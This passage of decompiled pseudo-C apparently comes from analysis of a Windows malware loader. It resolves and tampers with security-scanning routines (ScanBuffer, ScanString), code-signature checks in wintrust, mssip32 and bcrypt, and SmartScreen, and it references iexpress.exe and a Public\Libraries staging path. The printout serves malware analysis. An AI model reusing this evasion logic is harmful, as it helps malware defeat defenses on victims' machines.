                    				char _v2664;
                    				char _v2668;
                    				char _v2672;
                    				char _v2676;
                    				char _v2776;
                    				char _v2780;
                    				char _v2784;
                    				char _v2788;
                    				char _v2940;
                    				char _v2944;
                    				char _v2948;
                    				char _v2952;
                    				char _v2968;
                    				char _v3084;
                    				char _v3404;
                    				char _v3428;
                    				char _v3460;
                    				char _v3472;
                    				char _v3476;
                    				intOrPtr _v3480;
                    				char _v3484;
                    				char _v3488;
                    				char _v3492;
                    				intOrPtr _v3496;
                    				char _v3500;
                    				char _v3504;
                    				char _v3508;
                    				intOrPtr _v3512;
                    				char _v3516;
                    				char _v3520;
                    				char _v3524;
                    				intOrPtr _v3528;
                    				char _v3532;
                    				char _v3536;
                    				char _v3540;
                    				intOrPtr _v3544;
                    				char _v3548;
                    				char _v3552;
                    				char _v3556;
                    				intOrPtr _v3560;
                    				char _v3564;
                    				char _v3568;
                    				char _v3572;
                    				intOrPtr _v3576;
                    				char _v3580;
                    				char _v3584;
                    				char _v3588;
                    				char _v3592;
                    				intOrPtr _v3596;
                    				char _v3600;
                    				char _v3604;
                    				char _v3608;
                    				char _v3612;
                    				intOrPtr _v3616;
                    				char _v3620;
                    				char _v3624;
                    				char _v3628;
                    				intOrPtr _v3632;
                    				char _v3636;
                    				char _v3640;
                    				char _v3644;
                    				intOrPtr _v3648;
                    				char _v3652;
                    				char _v3656;
                    				char _v3660;
                    				intOrPtr _v3664;
                    				char _v3668;
                    				char _v3672;
                    				char _v3676;
                    				intOrPtr _v3680;
                    				char _v3684;
                    				char _v3688;
                    				char _v3692;
                    				intOrPtr _v3696;
                    				char _v3700;
                    				char _v3704;
                    				char _v3708;
                    				intOrPtr _v3712;
                    				char _v3716;
                    				char _v3720;
                    				char _v3724;
                    				intOrPtr _v3728;
                    				char _v3732;
                    				char _v3736;
                    				char _v3740;
                    				intOrPtr _v3744;
                    				char _v3748;
                    				char _v3752;
                    				char _v3756;
                    				intOrPtr _v3760;
                    				char _v3764;
                    				char _v3768;
                    				char _v3772;
                    				intOrPtr _v3776;
                    				char _v3780;
                    				char _v3784;
                    				char _v3820;
                    				intOrPtr _v3824;
                    				char _v3828;
                    				char _v3832;
                    				char _v3836;
                    				intOrPtr _v3840;
                    				char _v3844;
                    				char _v3848;
                    				char _v3852;
                    				intOrPtr _v3856;
                    				char _v3860;
                    				char _v3864;
                    				char _v3868;
                    				intOrPtr _v3872;
                    				char _v3876;
                    				char _v3880;
                    				char _v3884;
                    				intOrPtr _v3888;
                    				char _v3892;
                    				char _v3896;
                    				char _v3900;
                    				intOrPtr _v3904;
                    				char _v3908;
                    				char _v3912;
                    				char _v3916;
                    				intOrPtr _v3920;
                    				char _v3924;
                    				char _v3928;
                    				char _v3932;
                    				intOrPtr _v3936;
                    				char _v3940;
                    				char _v3944;
                    				char _v3948;
                    				intOrPtr _v3952;
                    				char _v3956;
                    				char _v3960;
                    				char _v3964;
                    				char _v3968;
                    				char _v3972;
                    				intOrPtr _v3976;
                    				char _v3980;
                    				char _v3984;
                    				char _v3988;
                    				intOrPtr _v3992;
                    				char _v3996;
                    				char _v4000;
                    				char _v4004;
                    				intOrPtr _v4008;
                    				char _v4012;
                    				char _v4016;
                    				char _v4020;
                    				char _v4024;
                    				char _v4028;
                    				char _v4032;
                    				char _v4036;
                    				intOrPtr _v4040;
                    				char _v4044;
                    				char _v4048;
                    				char _v4052;
                    				intOrPtr _v4056;
                    				char _v4060;
                    				char _v4064;
                    				char _v4068;
                    				intOrPtr _v4072;
                    				char _v4076;
                    				char _v4080;
                    				char _v4084;
                    				intOrPtr _v4088;
                    				char _v4092;
                    				char _v4096;
                    				char _v4100;
                    				intOrPtr _v4104;
                    				char _v4108;
                    				char _v4112;
                    				char _v4116;
                    				intOrPtr _v4120;
                    				char _v4124;
                    				char _v4128;
                    				char _v4132;
                    				intOrPtr _v4136;
                    				char _v4140;
                    				char _v4144;
                    				char _v4148;
                    				intOrPtr _v4152;
                    				char _v4156;
                    				char _v4160;
                    				char _v4164;
                    				intOrPtr _v4168;
                    				char _v4172;
                    				char _v4176;
                    				char _v4180;
                    				intOrPtr _v4184;
                    				char _v4188;
                    				char _v4192;
                    				intOrPtr _v4196;
                    				char _v4200;
                    				char _v4204;
                    				intOrPtr _v4208;
                    				char _v4212;
                    				char _v4216;
                    				char _v4220;
                    				intOrPtr _v4224;
                    				char _v4228;
                    				char _v4232;
                    				char _v4236;
                    				intOrPtr _v4240;
                    				char _v4244;
                    				char _v4248;
                    				char _v4252;
                    				intOrPtr _v4256;
                    				char _v4260;
                    				char _v4264;
                    				char _v4268;
                    				intOrPtr _v4272;
                    				char _v4276;
                    				char _v4280;
                    				char _v4284;
                    				char _v4288;
                    				intOrPtr _v4292;
                    				char _v4296;
                    				char _v4300;
                    				char _v4304;
                    				intOrPtr _v4308;
                    				char _v4312;
                    				char _v4316;
                    				char _v4320;
                    				char _v4324;
                    				char _v4328;
                    				char _v4332;
                    				intOrPtr _v4336;
                    				char _v4340;
                    				char _v4344;
                    				char _v4348;
                    				intOrPtr _v4352;
                    				char _v4356;
                    				char _v4360;
                    				char _v4364;
                    				intOrPtr _v4368;
                    				char _v4372;
                    				char _v4376;
                    				char _v4380;
                    				intOrPtr _v4384;
                    				char _v4388;
                    				char _v4392;
                    				char _v4396;
                    				intOrPtr _v4400;
                    				char _v4404;
                    				char _v4408;
                    				char _v4412;
                    				intOrPtr _v4416;
                    				char _v4420;
                    				char _v4424;
                    				char _v4428;
                    				char _v4432;
                    				char _v4436;
                    				intOrPtr _v4440;
                    				char _v4444;
                    				char _v4448;
                    				char _v4452;
                    				intOrPtr _v4456;
                    				char _v4460;
                    				char _v4464;
                    				char _v4468;
                    				intOrPtr _v4472;
                    				char _v4476;
                    				char _v4480;
                    				char _v4484;
                    				char _v4488;
                    				char _v4492;
                    				char _v4496;
                    				char _v4500;
                    				char _v4504;
                    				char _v4508;
                    				char _v4512;
                    				char _v4516;
                    				char _v4520;
                    				char _v4524;
                    				char _v4528;
                    				char _v4532;
                    				char _v4536;
                    				char _v4540;
                    				char _v4544;
                    				char _v4548;
                    				char _v4552;
                    				char _v4556;
                    				intOrPtr _v4560;
                    				char _v4564;
                    				char _v4568;
                    				char _v4572;
                    				intOrPtr _v4576;
                    				char _v4580;
                    				char _v4584;
                    				char _v4588;
                    				intOrPtr _v4592;
                    				char _v4596;
                    				char _v4600;
                    				char _v4604;
                    				char _v4608;
                    				char _v4612;
                    				char _v4616;
                    				char _v4620;
                    				char _v4624;
                    				char _v4628;
                    				char _v4632;
                    				char _v4636;
                    				char _v4640;
                    				char _v4644;
                    				char _v4648;
                    				char _v4652;
                    				char _v4656;
                    				char _v4660;
                    				char _v4664;
                    				char _v4668;
                    				char _v4672;
                    				char _v4676;
                    				char _v4680;
                    				char _v4684;
                    				char _v4688;
                    				char _v4692;
                    				char _v4696;
                    				char _v4700;
                    				char _v4704;
                    				char _v4708;
                    				char _v4712;
                    				char _v4716;
                    				char _v4720;
                    				char _v4724;
                    				char _v4728;
                    				char _v4732;
                    				char _v4736;
                    				char _v4740;
                    				char _v4744;
                    				char _v4748;
                    				char _v4752;
                    				char _v4756;
                    				char _v4760;
                    				char _v4764;
                    				char _v4768;
                    				char _v4772;
                    				char _v4776;
                    				char _v4780;
                    				intOrPtr _v4784;
                    				char _v4788;
                    				char _v4792;
                    				char _v4796;
                    				intOrPtr _v4800;
                    				char _v4804;
                    				char _v4808;
                    				char _v4812;
                    				intOrPtr _v4816;
                    				char _v4820;
                    				char _v4824;
                    				void* _t2163;
                    				void* _t2289;
                    				void* _t2447;
                    				_Unknown_base(*)()* _t2477;
                    				void* _t2912;
                    				_Unknown_base(*)()* _t3812;
                    				_Unknown_base(*)()* _t3979;
                    				_Unknown_base(*)()* _t4435;
                    				_Unknown_base(*)()* _t4453;
                    				void* _t4535;
                    				_Unknown_base(*)()* _t5093;
                    				_Unknown_base(*)()* _t5273;
                    				_Unknown_base(*)()* _t5334;
                    				void* _t5448;
                    				_Unknown_base(*)()* _t5539;
                    				_Unknown_base(*)()* _t5540;
                    				void* _t5542;
                    				intOrPtr _t5566;
                    				intOrPtr _t5590;
                    				_Unknown_base(*)()* _t5691;
                    				_Unknown_base(*)()* _t5702;
                    				void* _t5792;
                    				void* _t5797;
                    				void* _t5802;
                    				void* _t5805;
                    				void* _t5808;
                    				void* _t5811;
                    				void* _t5814;
                    				void* _t5817;
                    				void* _t5820;
                    				void* _t5823;
                    				void* _t5826;
                    				void* _t5829;
                    				void* _t5832;
                    				void* _t5835;
                    				void* _t5838;
                    				void* _t5843;
                    				void* _t5848;
                    				void* _t5853;
                    				void* _t5858;
                    				void* _t5865;
                    				void* _t5871;
                    				void* _t5879;
                    				void* _t5884;
                    				void* _t5889;
                    				void* _t5894;
                    				void* _t5900;
                    				void* _t5905;
                    				void* _t5910;
                    				void* _t5916;
                    				void* _t5922;
                    				void* _t5927;
                    				void* _t5935;
                    				void* _t5940;
                    				void* _t5947;
                    				void* _t5952;
                    				void* _t5957;
                    				void* _t5966;
                    				void* _t5971;
                    				void* _t5976;
                    				void* _t5981;
                    				intOrPtr _t5982;
                    				intOrPtr _t6009;
                    				intOrPtr _t6018;
                    				void* _t6030;
                    				void* _t6035;
                    				void* _t6040;
                    				void* _t6045;
                    				void* _t6052;
                    				void* _t6057;
                    				void* _t6062;
                    				void* _t6067;
                    				void* _t6074;
                    				void* _t6079;
                    				void* _t6084;
                    				void* _t6089;
                    				intOrPtr _t6090;
                    				void* _t6097;
                    				void* _t6102;
                    				void* _t6107;
                    				void* _t6112;
                    				void* _t6141;
                    				void* _t6146;
                    				void* _t6152;
                    				void* _t6157;
                    				void* _t6163;
                    				void* _t6168;
                    				void* _t6173;
                    				void* _t6178;
                    				void* _t6184;
                    				void* _t6189;
                    				void* _t6196;
                    				void* _t6201;
                    				void* _t6206;
                    				void* _t6213;
                    				void* _t6218;
                    				void* _t6223;
                    				void* _t6231;
                    				void* _t6236;
                    				void* _t6241;
                    				void* _t6247;
                    				void* _t6252;
                    				void* _t6257;
                    				void* _t6263;
                    				void* _t6268;
                    				void* _t6273;
                    				void* _t6278;
                    				void* _t6283;
                    				void* _t6288;
                    				void* _t6295;
                    				void* _t6300;
                    				void* _t6305;
                    				void* _t6308;
                    				void* _t6313;
                    				void* _t6318;
                    				void* _t6323;
                    				void* _t6326;
                    				void* _t6329;
                    				void* _t6332;
                    				void* _t6335;
                    				void* _t6338;
                    				void* _t6341;
                    				void* _t6344;
                    				void* _t6347;
                    				void* _t6350;
                    				void* _t6371;
                    				void* _t6376;
                    				void* _t6381;
                    				void* _t6384;
                    				void* _t6387;
                    				void* _t6390;
                    				void* _t6393;
                    				void* _t6396;
                    				void* _t6399;
                    				void* _t6402;
                    				void* _t6405;
                    				void* _t6408;
                    				void* _t6411;
                    				void* _t6414;
                    				void* _t6417;
                    				void* _t6420;
                    				void* _t6423;
                    				void* _t6426;
                    				void* _t6429;
                    				void* _t6432;
                    				void* _t6435;
                    				void* _t6438;
                    				void* _t6441;
                    				void* _t6444;
                    				void* _t6447;
                    				void* _t6452;
                    				void* _t6457;
                    				void* _t6462;
                    				void* _t6468;
                    				void* _t6473;
                    				void* _t6481;
                    				void* _t6486;
                    				void* _t6491;
                    				void* _t6496;
                    				void* _t6501;
                    				void* _t6506;
                    				void* _t6512;
                    				void* _t6517;
                    				void* _t6524;
                    				void* _t6529;
                    				void* _t6533;
                    				void* _t6538;
                    				void* _t6543;
                    				void* _t6548;
                    				void* _t6555;
                    				void* _t6560;
                    				void* _t6566;
                    				void* _t6571;
                    				void* _t6577;
                    				void* _t6582;
                    				void* _t6587;
                    				void* _t6592;
                    				void* _t6597;
                    				void* _t6602;
                    				void* _t6615;
                    				void* _t6620;
                    				void* _t6625;
                    				void* _t6630;
                    				void* _t6635;
                    				void* _t6640;
                    				void* _t6646;
                    				void* _t6653;
                    				void* _t6658;
                    				void* _t6663;
                    				void* _t6668;
                    				void* _t6675;
                    				void* _t6680;
                    				void* _t6685;
                    				void* _t6690;
                    				void* _t6697;
                    				void* _t6702;
                    				void* _t6707;
                    				intOrPtr _t6708;
                    				void* _t6715;
                    				void* _t6721;
                    				void* _t6726;
                    				void* _t6731;
                    				void* _t6739;
                    				intOrPtr _t6743;
                    				void* _t6750;
                    				void* _t6755;
                    				void* _t6760;
                    				void* _t6767;
                    				void* _t6772;
                    				void* _t6777;
                    				void* _t6782;
                    				void* _t6787;
                    				void* _t6794;
                    				void* _t6799;
                    				void* _t6804;
                    				void* _t6809;
                    				void* _t6814;
                    				void* _t6818;
                    				void* _t6823;
                    				void* _t6828;
                    				void* _t6833;
                    				void* _t6838;
                    				void* _t6843;
                    				void* _t6848;
                    				void* _t6854;
                    				void* _t6859;
                    				void* _t6870;
                    				void* _t6875;
                    				void* _t6883;
                    				void* _t6888;
                    				intOrPtr _t6892;
                    				void* _t6897;
                    				void* _t6902;
                    				void* _t6908;
                    				void* _t6913;
                    				void* _t6920;
                    				void* _t6925;
                    				void* _t6930;
                    				void* _t6935;
                    				void* _t6940;
                    				void* _t6945;
                    				void* _t6951;
                    				void* _t6956;
                    				void* _t6961;
                    				void* _t6966;
                    				void* _t6973;
                    				void* _t6978;
                    				void* _t6983;
                    				void* _t6988;
                    				void* _t6993;
                    				void* _t6998;
                    				void* _t7004;
                    				void* _t7009;
                    				void* _t7014;
                    				void* _t7019;
                    				void* _t7024;
                    				void* _t7029;
                    				void* _t7036;
                    				void* _t7041;
                    				void* _t7046;
                    				void* _t7051;
                    				void* _t7056;
                    				void* _t7061;
                    				void* _t7066;
                    				void* _t7071;
                    				void* _t7076;
                    				void* _t7081;
                    				void* _t7086;
                    				void* _t7091;
                    				void* _t7096;
                    				void* _t7101;
                    				void* _t7104;
                    				void* _t7105;
                    				intOrPtr _t7107;
                    				intOrPtr _t7108;
                    				void* _t7122;
                    				void* _t7125;
                    
                    				_t7125 = __fp0;
                    				_t7105 = __esi;
                    				_t7104 = __edi;
                    				_t7107 = _t7108;
                    				_t5542 = 0x25a;
                    				do {
                    					_push(0);
                    					_push(0);
                    					_t5542 = _t5542 - 1;
                    				} while (_t5542 != 0);
                    				_push(_t5542);
                    				_push(__ebx);
                    				_push(_t7107);
                    				_push(0x3286a6b);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t7108;
                    				_push(0x8ae); // executed
                    				L03277B0C(); // executed
                    				if(0 == 0) {
                    					E032644F4(0x33928a8, 0x3286a94);
                    				} else {
                    					E032644F4(0x33928a8, 0x3286a84);
                    				}
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("ScanString");
                    				E03264824();
                    				E03264698( &_v8, E03264964(_v12));
                    				_push(_v8);
                    				E032647B0( &_v20,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v16, E03264964(_v20));
                    				_pop(_t5792); // executed
                    				E03277C04(_v16,  *0x33928a8, _t5792, 0); // executed
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("OpenSession");
                    				E03264824();
                    				E03264698( &_v24, E03264964(_v28));
                    				_push(_v24);
                    				E032647B0( &_v36,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v32, E03264964(_v36));
                    				_pop(_t5797); // executed
                    				E03277C04(_v32,  *0x33928a8, _t5797, 0); // executed
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("ScanBuffer");
                    				E03264824();
                    				E03264698( &_v40, E03264964(_v44));
                    				_push(_v40);
                    				_t5545 =  *0x33928a8;
                    				E032647B0( &_v52,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v48, E03264964(_v52));
                    				_pop(_t5802); // executed
                    				E03277C04(_v48,  *0x33928a8, _t5802, 0); // executed
                    				E03264698( &_v56, "TrustOpenStores");
                    				_push(_v56);
                    				E03264698( &_v60, "wintrust");
                    				_pop(_t5805); // executed
                    				E03277C04(_v60,  *0x33928a8, _t5805, 0); // executed
                    				E03264698( &_v64, "WintrustAddActionID");
                    				_push(_v64);
                    				E03264698( &_v68, "wintrust");
                    				_pop(_t5808); // executed
                    				E03277C04(_v68,  *0x33928a8, _t5808, 0); // executed
                    				E03264698( &_v72, "FindCertsByIssuer");
                    				_push(_v72);
                    				E03264698( &_v76, "wintrust");
                    				_pop(_t5811); // executed
                    				E03277C04(_v76,  *0x33928a8, _t5811, 0); // executed
                    				E03264698( &_v80, "CryptSIPGetInfo");
                    				_push(_v80);
                    				E03264698( &_v84, "mssip32");
                    				_pop(_t5814); // executed
                    				E03277C04(_v84, _t5545, _t5814, 0); // executed
                    				E03264698( &_v88, "CryptSIPVerifyIndirectData");
                    				_push(_v88);
                    				E03264698( &_v92, "mssip32");
                    				_pop(_t5817); // executed
                    				E03277C04(_v92, _t5545, _t5817, 0); // executed
                    				E03264698( &_v96, "CryptSIPGetSignedDataMsg");
                    				_push(_v96);
                    				E03264698( &_v100, "mssip32");
                    				_pop(_t5820); // executed
                    				E03277C04(_v100, _t5545, _t5820, 0); // executed
                    				E03264698( &_v104, "BCryptVerifySignature");
                    				_push(_v104);
                    				E03264698( &_v108, "bcrypt");
                    				_pop(_t5823); // executed
                    				E03277C04(_v108, _t5545, _t5823, 0); // executed
                    				E03264698( &_v112, "BCryptQueryProviderRegistration");
                    				_push(_v112);
                    				E03264698( &_v116, "bcrypt");
                    				_pop(_t5826); // executed
                    				E03277C04(_v116, _t5545, _t5826, 0); // executed
                    				E03264698( &_v120, "BCryptRegisterProvider");
                    				_push(_v120);
                    				E03264698( &_v124, "bcrypt");
                    				_pop(_t5829);
                    				E03277C04(_v124, _t5545, _t5829, 0);
                    				E03264698( &_v128, "DllGetClassObject");
                    				_push(_v128);
                    				E03264698( &_v132, "smartscreenps");
                    				_pop(_t5832); // executed
                    				E03277C04(_v132, _t5545, _t5832, 0); // executed
                    				E03264698( &_v136, "DllGetActivationFactory");
                    				_push(_v136);
                    				E03264698( &_v140, "smartscreenps");
                    				_pop(_t5835); // executed
                    				E03277C04(_v140, _t5545, _t5835, 0); // executed
                    				E03264698( &_v144, "DllRegisterServer");
                    				_push(_v144);
                    				E03264698( &_v148, "smartscreenps");
                    				_pop(_t5838); // executed
                    				E03277C04(_v148, _t5545, _t5838, 0); // executed
                    				E03262EE0();
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("Initialize");
                    				E03264824();
                    				E03264698( &_v152, E03264964(_v156));
                    				_push(_v152);
                    				E032647B0( &_v164,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v160, E03264964(_v164));
                    				_pop(_t5843); // executed
                    				E03277C04(_v160,  *0x33928a8, _t5843, 0); // executed
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("UacScan");
                    				E03264824();
                    				E03264698( &_v168, E03264964(_v172));
                    				_push(_v168);
                    				E032647B0( &_v180,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v176, E03264964(_v180));
                    				_pop(_t5848); // executed
                    				E03277C04(_v176,  *0x33928a8, _t5848, 0); // executed
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("UacInitialize");
                    				E03264824();
                    				E03264698( &_v184, E03264964(_v188));
                    				_push(_v184);
                    				E032647B0( &_v196,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v192, E03264964(_v196));
                    				_pop(_t5853); // executed
                    				E03277C04(_v192,  *0x33928a8, _t5853, 0); // executed
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("ScanBuffer");
                    				E03264824();
                    				E03264698( &_v200, E03264964(_v204));
                    				_push(_v200);
                    				E032647B0( &_v212,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v208, E03264964(_v212));
                    				_pop(_t5858); // executed
                    				E03277C04(_v208,  *0x33928a8, _t5858, 0); // executed
                    				E03264698(0x3392844, E03264964( *((intOrPtr*)(0x3289ad4 + E03277CF8(1, 3) * 4))));
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("ScanString");
                    				E03264824();
                    				E03264698( &_v216, E03264964(_v220));
                    				_push(_v216);
                    				E032647B0( &_v228,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v224, E03264964(_v228));
                    				_pop(_t5865); // executed
                    				E03277C04(_v224,  *0x33928a8, _t5865, 0); // executed
                    				E032647B0( &_v232,  *0x3392844, "C:\\Windows\\System32\\");
                    				_t2163 = E03267E40(_v232);
                    				_t7113 = _t2163;
                    				if(_t2163 == 0) {
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanString");
                    					E03264824();
                    					E03264698( &_v252, E03264964(_v256));
                    					_push(_v252);
                    					E032647B0( &_v264,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v260, E03264964(_v264));
                    					_pop(_t5871);
                    					E03277C04(_v260,  *0x33928a8, _t5871, __eflags);
                    					E032644F4(0x3392820, "iexpress.exe");
                    				} else {
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanString");
                    					E03264824();
                    					E03264698( &_v236, E03264964(_v240));
                    					_push(_v236);
                    					E032647B0( &_v248,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v244, E03264964(_v248));
                    					_pop(_t7101); // executed
                    					E03277C04(_v244,  *0x33928a8, _t7101, _t7113); // executed
                    					E032644F4(0x3392820,  *0x3392844);
                    				}
                    				E0326C348(0,  &_v268);
                    				E032644F4(0x3392800, _v268);
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("UacScan");
                    				E03264824();
                    				E03264698( &_v272, E03264964(_v276));
                    				_push(_v272);
                    				E032647B0( &_v284,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v280, E03264964(_v284));
                    				_pop(_t5879); // executed
                    				E03277C04(_v280,  *0x33928a8, _t5879, _t7113); // executed
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("Initialize");
                    				E03264824();
                    				E03264698( &_v288, E03264964(_v292));
                    				_push(_v288);
                    				E032647B0( &_v300,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v296, E03264964(_v300));
                    				_pop(_t5884); // executed
                    				E03277C04(_v296,  *0x33928a8, _t5884, _t7113); // executed
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("UacInitialize");
                    				E03264824();
                    				E03264698( &_v304, E03264964(_v308));
                    				_push(_v304);
                    				E032647B0( &_v316,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v312, E03264964(_v316));
                    				_pop(_t5889); // executed
                    				E03277C04(_v312,  *0x33928a8, _t5889, _t7113); // executed
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("ScanString");
                    				E03264824();
                    				E03264698( &_v320, E03264964(_v324));
                    				_push(_v320);
                    				E032647B0( &_v332,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v328, E03264964(_v332));
                    				_pop(_t5894); // executed
                    				E03277C04(_v328,  *0x33928a8, _t5894, _t7113); // executed
                    				E032644F4(0x339287c, "C:\\Users\\Public\\Libraries");
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("Initialize");
                    				E03264824();
                    				E03264698( &_v336, E03264964(_v340));
                    				_push(_v336);
                    				E032647B0( &_v348,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v344, E03264964(_v348));
                    				_pop(_t5900); // executed
                    				E03277C04(_v344,  *0x33928a8, _t5900, _t7113); // executed
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("ScanBuffer");
                    				E03264824();
                    				E03264698( &_v352, E03264964(_v356));
                    				_push(_v352);
                    				E032647B0( &_v364,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v360, E03264964(_v364));
                    				_pop(_t5905); // executed
                    				E03277C04(_v360,  *0x33928a8, _t5905, _t7113); // executed
                    				_push(0x3286aa0);
                    				_push( *0x33928a8);
                    				_push("OpenSession");
                    				E03264824();
                    				E03264698( &_v368, E03264964(_v372));
                    				_push(_v368);
                    				E032647B0( &_v380,  *0x33928a8, 0x3286aa0);
                    				E03264698( &_v376, E03264964(_v380));
                    				_pop(_t5910); // executed
                    				E03277C04(_v376,  *0x33928a8, _t5910, _t7113); // executed
                    				E03264698( &_v384, E03264964( *0x33927f0));
                    				_t2289 = E03267E40(_v384);
                    				_t7114 = _t2289;
                    				if(_t2289 == 0) {
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("UacScan");
                    					E03264824();
                    					E03264698( &_v596, E03264964(_v600));
                    					_push(_v596);
                    					E032647B0( &_v608,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v604, E03264964(_v608));
                    					_pop(_t5916); // executed
                    					E03277C04(_v604,  *0x33928a8, _t5916, __eflags); // executed
                    					E032644F4(0x3392898, 0x3286cbc);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v612, E03264964(_v616));
                    					_push(_v612);
                    					E032647B0( &_v624,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v620, E03264964(_v624));
                    					_pop(_t5922); // executed
                    					E03277C04(_v620,  *0x33928a8, _t5922, __eflags); // executed
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanBuffer");
                    					E03264824();
                    					E03264698( &_v628, E03264964(_v632));
                    					_push(_v628);
                    					E032647B0( &_v640,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v636, E03264964(_v640));
                    					_pop(_t5927); // executed
                    					E03277C04(_v636,  *0x33928a8, _t5927, __eflags); // executed
                    					E03264DA4( &_v648,  *0x3392800);
                    					E0327CBE8(_v648, 0x3392880,  &_v644, _t7105); // executed
                    					E032644F4(0x3392878, _v644);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v652, E03264964(_v656));
                    					_push(_v652);
                    					E032647B0( &_v664,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v660, E03264964(_v664));
                    					_pop(_t5935); // executed
                    					E03277C04(_v660,  *0x33928a8, _t5935, __eflags); // executed
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanString");
                    					E03264824();
                    					E03264698( &_v668, E03264964(_v672));
                    					_push(_v668);
                    					E032647B0( &_v680,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v676, E03264964(_v680));
                    					_pop(_t5940); // executed
                    					E03277C04(_v676,  *0x33928a8, _t5940, __eflags); // executed
                    					E0327CD4C( *0x3392878, 0x3392880,  &_v684, 0x3286cc8, _t7104, _t7105); // executed
                    					_t5566 =  *0x327ca10; // 0x327ca14
                    					E032657DC(0x3392880, _t5566, _v684);
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanBuffer");
                    					E03264824();
                    					E03264698( &_v688, E03264964(_v692));
                    					_push(_v688);
                    					E032647B0( &_v700,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v696, E03264964(_v700));
                    					_pop(_t5947); // executed
                    					E03277C04(_v696,  *0x33928a8, _t5947, __eflags); // executed
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("Initialize");
                    					E03264824();
                    					E03264698( &_v704, E03264964(_v708));
                    					_push(_v704);
                    					E032647B0( &_v716,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v712, E03264964(_v716));
                    					_pop(_t5952); // executed
                    					E03277C04(_v712,  *0x33928a8, _t5952, __eflags); // executed
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanString");
                    					E03264824();
                    					E03264698( &_v720, E03264964(_v724));
                    					_push(_v720);
                    					E032647B0( &_v732,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v728, E03264964(_v732));
                    					_pop(_t5957); // executed
                    					E03277C04(_v728,  *0x33928a8, _t5957, __eflags); // executed
                    					E032644F4(0x3392814,  *((intOrPtr*)( *0x3392880 + 4)));
                    					E032644F4(0x3392838,  *((intOrPtr*)( *0x3392880 + 8)));
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v736, E03264964(_v740));
                    					_push(_v736);
                    					E032647B0( &_v748,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v744, E03264964(_v748));
                    					_pop(_t5966); // executed
                    					E03277C04(_v744,  *0x33928a8, _t5966, __eflags); // executed
                    					_push(0x3286aa0);
                    					_push( *0x33928a8);
                    					_push("ScanBuffer");
                    					E03264824();
                    					E03264698( &_v752, E03264964(_v756));
                    					_push(_v752);
                    					E032647B0( &_v764,  *0x33928a8, 0x3286aa0);
                    					E03264698( &_v760, E03264964(_v764));
                    					_pop(_t5971); // executed
                    					E03277C04(_v760,  *0x33928a8, _t5971, __eflags); // executed
                    					_t2447 = E0327CCD4( *0x3392838, 0x3392880, _t5971, _t7104, _t7105, __eflags, _t7125);
                    					__eflags = _t2447 - 1;
                    					if(_t2447 == 1) {
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("Initialize");
                    						E03264824();
                    						E03264698( &_v768, E03264964(_v772));
                    						_push(_v768);
                    						E032647B0( &_v780,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v776, E03264964(_v780));
                    						_pop(_t6908); // executed
                    						E03277C04(_v776,  *0x33928a8, _t6908, __eflags); // executed
                    						_push(0x3286aa0);
                    						_push( *0x33928a8);
                    						_push("ScanString");
                    						E03264824();
                    						E03264698( &_v784, E03264964(_v788));
                    						_push(_v784);
                    						E032647B0( &_v796,  *0x33928a8, 0x3286aa0);
                    						E03264698( &_v792, E03264964(_v796));
                    						_pop(_t6913); // executed
                    						E03277C04(_v792,  *0x33928a8, _t6913, __eflags); // executed
